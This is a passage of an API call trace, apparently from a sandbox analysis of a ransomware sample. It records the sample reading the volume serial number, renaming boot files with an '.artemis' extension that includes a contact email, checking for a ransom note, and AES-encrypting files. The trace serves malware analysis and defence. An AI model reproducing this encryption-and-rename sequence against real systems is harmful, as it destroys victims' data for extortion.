ppvObject=0x689eecc*=0x6737330) returned 0x0 [0166.850] WbemLocator:IUnknown:QueryInterface (in: This=0x6737330, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ee88 | out: ppvObject=0x689ee88*=0x0) returned 0x80004002 [0166.850] WbemLocator:IUnknown:AddRef (This=0x6737330) returned 0x3 [0166.850] WbemLocator:IUnknown:QueryInterface (in: This=0x6737330, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e7e4 | out: ppvObject=0x689e7e4*=0x0) returned 0x80004002 [0166.850] WbemLocator:IUnknown:QueryInterface (in: This=0x6737330, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e794 | out: ppvObject=0x689e794*=0x0) returned 0x80004002 [0166.850] WbemLocator:IUnknown:QueryInterface (in: This=0x6737330, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e7a0 | out: ppvObject=0x689e7a0*=0x0) returned 0x80004002 [0166.850] CoGetContextToken (in: pToken=0x689e800 | out: pToken=0x689e800) returned 0x0 [0166.850] CoGetContextToken (in: pToken=0x689ec08 | out: pToken=0x689ec08) returned 0x0 [0166.850] WbemLocator:IUnknown:QueryInterface (in: This=0x6737330, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec98 | out: ppvObject=0x689ec98*=0x0) returned 0x80004002 [0166.850] WbemLocator:IUnknown:Release (This=0x6737330) returned 0x2 [0166.850] WbemLocator:IUnknown:Release (This=0x6737330) returned 0x1 [0166.850] CoGetContextToken (in: pToken=0x689f278 | out: pToken=0x689f278) returned 0x0 [0166.850] CoGetContextToken (in: pToken=0x689f1d8 | out: pToken=0x689f1d8) returned 0x0 [0166.850] WbemLocator:IUnknown:QueryInterface (in: This=0x6737330, riid=0x689f2a8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x689f2a4 | out: ppvObject=0x689f2a4*=0x6737330) returned 0x0 [0166.850] WbemLocator:IUnknown:AddRef (This=0x6737330) returned 0x3 [0166.850] WbemLocator:IUnknown:Release (This=0x6737330) returned 0x2 [0166.850] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738d20, puCount=0x689f43c | out: puCount=0x689f43c*=0x2) returned 0x0 [0166.850] WbemDefPath:IWbemPath:GetText (in: This=0x6738d20, lFlags=8, puBuffLength=0x689f438*=0x0, pszText=0x0 | out: puBuffLength=0x689f438*=0xf, pszText=0x0) returned 0x0 [0166.851] WbemDefPath:IWbemPath:GetText (in: This=0x6738d20, lFlags=8, puBuffLength=0x689f438*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f438*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0166.851] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x689f314 | out: ppv=0x689f314*=0x6737340) returned 0x0 [0166.851] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737340, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x689f3a8 | out: ppNamespace=0x689f3a8*=0x672f0fc) returned 0x0 [0174.584] WbemLocator:IUnknown:QueryInterface (in: This=0x672f0fc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f244 | out: ppvObject=0x689f244*=0x781ea4) returned 0x0 [0174.584] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781ea4, pProxy=0x672f0fc, pAuthnSvc=0x689f294, pAuthzSvc=0x689f290, pServerPrincName=0x689f288, pAuthnLevel=0x689f28c, pImpLevel=0x689f27c, pAuthInfo=0x689f280, pCapabilites=0x689f284 | out: pAuthnSvc=0x689f294*=0xa, pAuthzSvc=0x689f290*=0x0, pServerPrincName=0x689f288, pAuthnLevel=0x689f28c*=0x6, pImpLevel=0x689f27c*=0x2, pAuthInfo=0x689f280, pCapabilites=0x689f284*=0x1) returned 0x0 [0174.584] WbemLocator:IUnknown:Release (This=0x781ea4) returned 0x1 [0174.584] WbemLocator:IUnknown:QueryInterface (in: This=0x672f0fc, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f238 | out: ppvObject=0x689f238*=0x781ec4) returned 0x0 [0174.584] WbemLocator:IUnknown:QueryInterface (in: This=0x672f0fc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f234 | out: ppvObject=0x689f234*=0x781ea4) returned 0x0 [0174.585] WbemLocator:IClientSecurity:SetBlanket (This=0x781ea4, pProxy=0x672f0fc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0174.585] WbemLocator:IUnknown:Release (This=0x781ea4) returned 0x2 [0174.585] WbemLocator:IUnknown:Release (This=0x781ec4) returned 0x1 [0174.585] CoTaskMemFree (pv=0x77e148) [0174.585] WbemLocator:IUnknown:Release (This=0x6737340) returned 0x0 [0174.585] WbemLocator:IUnknown:QueryInterface (in: This=0x672f0fc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ee34 | out: ppvObject=0x689ee34*=0x781ec4) returned 0x0 [0174.586] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689edf0 | out: ppvObject=0x689edf0*=0x0) returned 0x80004002 [0174.587] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ec0c | out: ppvObject=0x689ec0c*=0x0) returned 0x80004002 [0174.588] WbemLocator:IUnknown:AddRef (This=0x781ec4) returned 0x3 [0174.588] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e74c | out: ppvObject=0x689e74c*=0x0) returned 0x80004002 [0174.589] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e6fc | out: ppvObject=0x689e6fc*=0x0) returned 0x80004002 [0174.589] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e708 | out: ppvObject=0x689e708*=0x781e24) returned 0x0 [0174.589] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781e24, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e710 | out: pCid=0x689e710*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0174.589] WbemLocator:IUnknown:Release (This=0x781e24) returned 0x3 [0174.589] CoGetContextToken (in: pToken=0x689e768 | out: pToken=0x689e768) returned 0x0 [0174.589] CoGetContextToken (in: pToken=0x689eb70 | out: pToken=0x689eb70) returned 0x0 [0174.590] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec00 | out: ppvObject=0x689ec00*=0x781eac) returned 0x0 [0174.590] WbemLocator:IRpcOptions:Query (in: This=0x781eac, pPrx=0x781ec4, dwProperty=2, pdwValue=0x689ec28 | out: pdwValue=0x689ec28) returned 0x80004002 [0174.590] WbemLocator:IUnknown:Release (This=0x781eac) returned 0x3 [0174.590] WbemLocator:IUnknown:Release (This=0x781ec4) returned 0x2 [0174.590] CoGetContextToken (in: pToken=0x689f148 | out: pToken=0x689f148) returned 0x0 [0174.590] CoGetContextToken (in: pToken=0x689f0a8 | out: pToken=0x689f0a8) returned 0x0 [0174.590] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x689f178*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x689f174 | out: ppvObject=0x689f174*=0x672f0fc) returned 0x0 [0174.590] WbemLocator:IUnknown:AddRef (This=0x672f0fc) returned 0x4 [0174.590] WbemLocator:IUnknown:Release (This=0x672f0fc) returned 0x3 [0174.590] WbemLocator:IUnknown:Release (This=0x672f0fc) returned 0x2 [0174.590] SysStringLen (param_1=0x0) returned 0x0 [0174.590] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738cb0, puCount=0x689f50c | out: puCount=0x689f50c*=0x0) returned 0x0 [0174.590] WbemDefPath:IWbemPath:GetText (in: This=0x6738cb0, lFlags=2, puBuffLength=0x689f508*=0x0, pszText=0x0 | out: puBuffLength=0x689f508*=0x20, pszText=0x0) returned 0x0 [0174.590] WbemDefPath:IWbemPath:GetText (in: This=0x6738cb0, lFlags=2, puBuffLength=0x689f508*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f508*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0174.590] CoGetContextToken (in: pToken=0x689f178 | out: pToken=0x689f178) returned 0x0 [0174.590] WbemLocator:IUnknown:AddRef (This=0x781ec4) returned 0x3 [0174.590] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f00c | out: ppvObject=0x689f00c*=0x781ec4) returned 0x0 [0174.591] WbemLocator:IUnknown:Release (This=0x781ec4) returned 0x3 [0174.591] WbemLocator:IUnknown:Release (This=0x781ec4) returned 0x2 [0174.591] WbemDefPath:IWbemPath:GetText (in: This=0x6738cb0, lFlags=2, puBuffLength=0x689f510*=0x0, pszText=0x0 | out: puBuffLength=0x689f510*=0x20, pszText=0x0) returned 0x0 [0174.591] WbemDefPath:IWbemPath:GetText (in: This=0x6738cb0, lFlags=2, puBuffLength=0x689f510*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f510*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0174.591] IWbemServices:GetObject (in: This=0x672f0fc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x689f4c4*=0x0, ppCallResult=0x0 | out: ppObject=0x689f4c4*=0x673bac8, ppCallResult=0x0) returned 0x0 [0175.159] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738d20, puCount=0x689f4c4 | out: puCount=0x689f4c4*=0x2) returned 0x0 [0175.159] WbemDefPath:IWbemPath:GetText (in: This=0x6738d20, lFlags=4, puBuffLength=0x689f4c0*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c0*=0xf, pszText=0x0) returned 0x0 [0175.159] WbemDefPath:IWbemPath:GetText (in: This=0x6738d20, lFlags=4, puBuffLength=0x689f4c0*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f4c0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0175.159] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f4c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f9058*=0, plFlavor=0x38f905c*=0 | out: pVal=0x689f4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x38f9058*=8, plFlavor=0x38f905c*=0) returned 0x0 [0175.159] SysStringByteLen (bstr="9C354B42") returned 0x10 [0175.159] SysStringByteLen (bstr="9C354B42") returned 0x10 [0175.159] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f4c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f9058*=8, plFlavor=0x38f905c*=0 | out: pVal=0x689f4c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x38f9058*=8, plFlavor=0x38f905c*=0) returned 0x0 [0175.159] SysStringByteLen (bstr="9C354B42") returned 0x10 [0175.159] SysStringByteLen (bstr="9C354B42") returned 0x10 [0175.159] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x689f0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0175.159] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x689f0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x3f [0175.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f528) returned 1 [0175.159] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), fInfoLevelId=0x0, lpFileInformation=0x689f5a4 | out: lpFileInformation=0x689f5a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0175.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f524) returned 1 [0175.160] MoveFileW (lpExistingFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\boot\\bootstat.dat.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0175.160] GetFullPathNameW (in: lpFileName="C:\\Boot\\memtest.exe", nBufferLength=0x105, lpBuffer=0x689f16c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\memtest.exe", lpFilePart=0x0) returned 0x13 [0175.160] GetFullPathNameW (in: lpFileName="C:\\Boot\\memtest.exe", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\memtest.exe", lpFilePart=0x0) returned 0x13 [0175.160] GetFullPathNameW (in: lpFileName="C:\\Boot\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689f16c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\info-decrypt.hta", lpFilePart=0x0) returned 0x18 [0175.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f5cc) returned 1 [0175.160] GetFileAttributesExW (in: lpFileName="C:\\Boot\\info-decrypt.hta" (normalized: "c:\\boot\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x689f648 | out: lpFileInformation=0x689f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1f09e0, ftCreationTime.dwHighDateTime=0x1d6a20a, ftLastAccessTime.dwLowDateTime=0xfe1f09e0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xfe1f09e0, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0175.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f5c8) returned 1 [0175.161] GetFullPathNameW (in: lpFileName="C:\\Boot\\memtest.exe", nBufferLength=0x105, lpBuffer=0x689f0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\memtest.exe", lpFilePart=0x0) returned 0x13 [0175.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f594) returned 1 [0175.161] GetFileAttributesExW (in: lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), fInfoLevelId=0x0, lpFileInformation=0x38f9448 | out: lpFileInformation=0x38f9448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980)) returned 1 [0175.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f590) returned 1 [0175.359] GetFullPathNameW (in: lpFileName="C:\\Boot\\memtest.exe", nBufferLength=0x105, lpBuffer=0x689efd4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\memtest.exe", lpFilePart=0x0) returned 0x13 [0175.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4c8) returned 1 [0175.359] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x588 [0175.359] GetFileType (hFile=0x588) returned 0x1 [0175.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4c4) returned 1 [0175.359] GetFileType (hFile=0x588) returned 0x1 [0175.359] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x689f5d0 | out: lpFileSizeHigh=0x689f5d0*=0x0) returned 0x76980 [0186.647] ReadFile (in: hFile=0x588, lpBuffer=0x45f5650, nNumberOfBytesToRead=0x76980, lpNumberOfBytesRead=0x689f57c, lpOverlapped=0x0 | out: lpBuffer=0x45f5650*, lpNumberOfBytesRead=0x689f57c*=0x76980, lpOverlapped=0x0) returned 1 [0186.701] CloseHandle (hObject=0x588) returned 1 [0189.740] CryptAcquireContextW (in: phProv=0x689f51c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x689f51c*=0x7a9f48) returned 1 [0189.741] CryptGenRandom (in: hProv=0x7a9f48, dwLen=0x10, pbBuffer=0x33d750c | out: pbBuffer=0x33d750c) returned 1 [0190.399] CryptImportKey (in: hProv=0x7a9f48, pbData=0x34362c8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x689f4ec | out: phKey=0x689f4ec*=0x77b530) returned 1 [0190.399] CryptContextAddRef (hProv=0x7a9f48, pdwReserved=0x0, dwFlags=0x0) returned 1 [0190.399] CryptContextAddRef (hProv=0x7a9f48, pdwReserved=0x0, dwFlags=0x0) returned 1 [0190.399] CryptDuplicateKey (in: hKey=0x77b530, pdwReserved=0x0, dwFlags=0x0, phKey=0x689f4dc | out: phKey=0x689f4dc*=0x77adb0) returned 1 [0190.399] CryptContextAddRef (hProv=0x7a9f48, pdwReserved=0x0, dwFlags=0x0) returned 1 [0190.399] CryptSetKeyParam (hKey=0x77adb0, dwParam=0x4, pbData=0x34363a8*=0x1, dwFlags=0x0) returned 1 [0190.399] CryptSetKeyParam (hKey=0x77adb0, dwParam=0x1, pbData=0x3436374, dwFlags=0x0) returned 1 [0190.403] CryptEncrypt (in: hKey=0x77adb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x466bff0*, pdwDataLen=0x689f548*=0x76990, dwBufLen=0x76990 | out: pbData=0x466bff0*, pdwDataLen=0x689f548*=0x76990) returned 1 [0190.408] CryptEncrypt (in: hKey=0x77adb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34363d0*, pdwDataLen=0x689f550*=0x0, dwBufLen=0x10 | out: pbData=0x34363d0*, pdwDataLen=0x689f550*=0x10) returned 1 [0190.428] CryptDestroyKey (hKey=0x77b530) returned 1 [0190.428] CryptReleaseContext (hProv=0x7a9f48, dwFlags=0x0) returned 1 [0190.428] CryptReleaseContext (hProv=0x7a9f48, dwFlags=0x0) returned 1 [0190.428] GetFullPathNameW (in: lpFileName="C:\\Boot\\memtest.exe", nBufferLength=0x105, lpBuffer=0x689efc0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\memtest.exe", lpFilePart=0x0) returned 0x13 [0190.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4b4) returned 1 [0190.428] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0190.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689e2f0) returned 1 [0190.430] CoTaskMemAlloc (cb=0x20c) returned 0x9825530 [0190.430] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9825530 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0190.430] CoTaskMemFree (pv=0x9825530) [0190.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x689efa8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0190.431] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f4f0 | out: ppv=0x689f4f0*=0x72015c) returned 0x0 [0190.431] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f4e8 | out: pAptType=0x689f4e8*=1) returned 0x0 [0190.431] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f4ec | out: ppvObject=0x689f4ec*=0x0) returned 0x80004002 [0190.431] IUnknown:Release (This=0x72015c) returned 0x1 [0190.432] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ee58 | out: ppv=0x689ee58*=0x6736f08) returned 0x0 [0190.432] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f08, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f070 | out: ppvObject=0x689f070*=0x0) returned 0x80004002 [0190.432] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f08, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f084 | out: ppvObject=0x689f084*=0x6738af0) returned 0x0 [0190.432] WbemDefPath:IUnknown:Release (This=0x6736f08) returned 0x0 [0190.432] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eca4 | out: ppvObject=0x689eca4*=0x6738af0) returned 0x0 [0190.432] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ec60 | out: ppvObject=0x689ec60*=0x0) returned 0x80004002 [0190.433] WbemDefPath:IUnknown:AddRef (This=0x6738af0) returned 0x3 [0190.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e5bc | out: ppvObject=0x689e5bc*=0x0) returned 0x80004002 [0190.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e56c | out: ppvObject=0x689e56c*=0x0) returned 0x80004002 [0190.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e578 | out: ppvObject=0x689e578*=0x77c008) returned 0x0 [0190.433] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c008, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e580 | out: pCid=0x689e580*(Data1=0x33a, 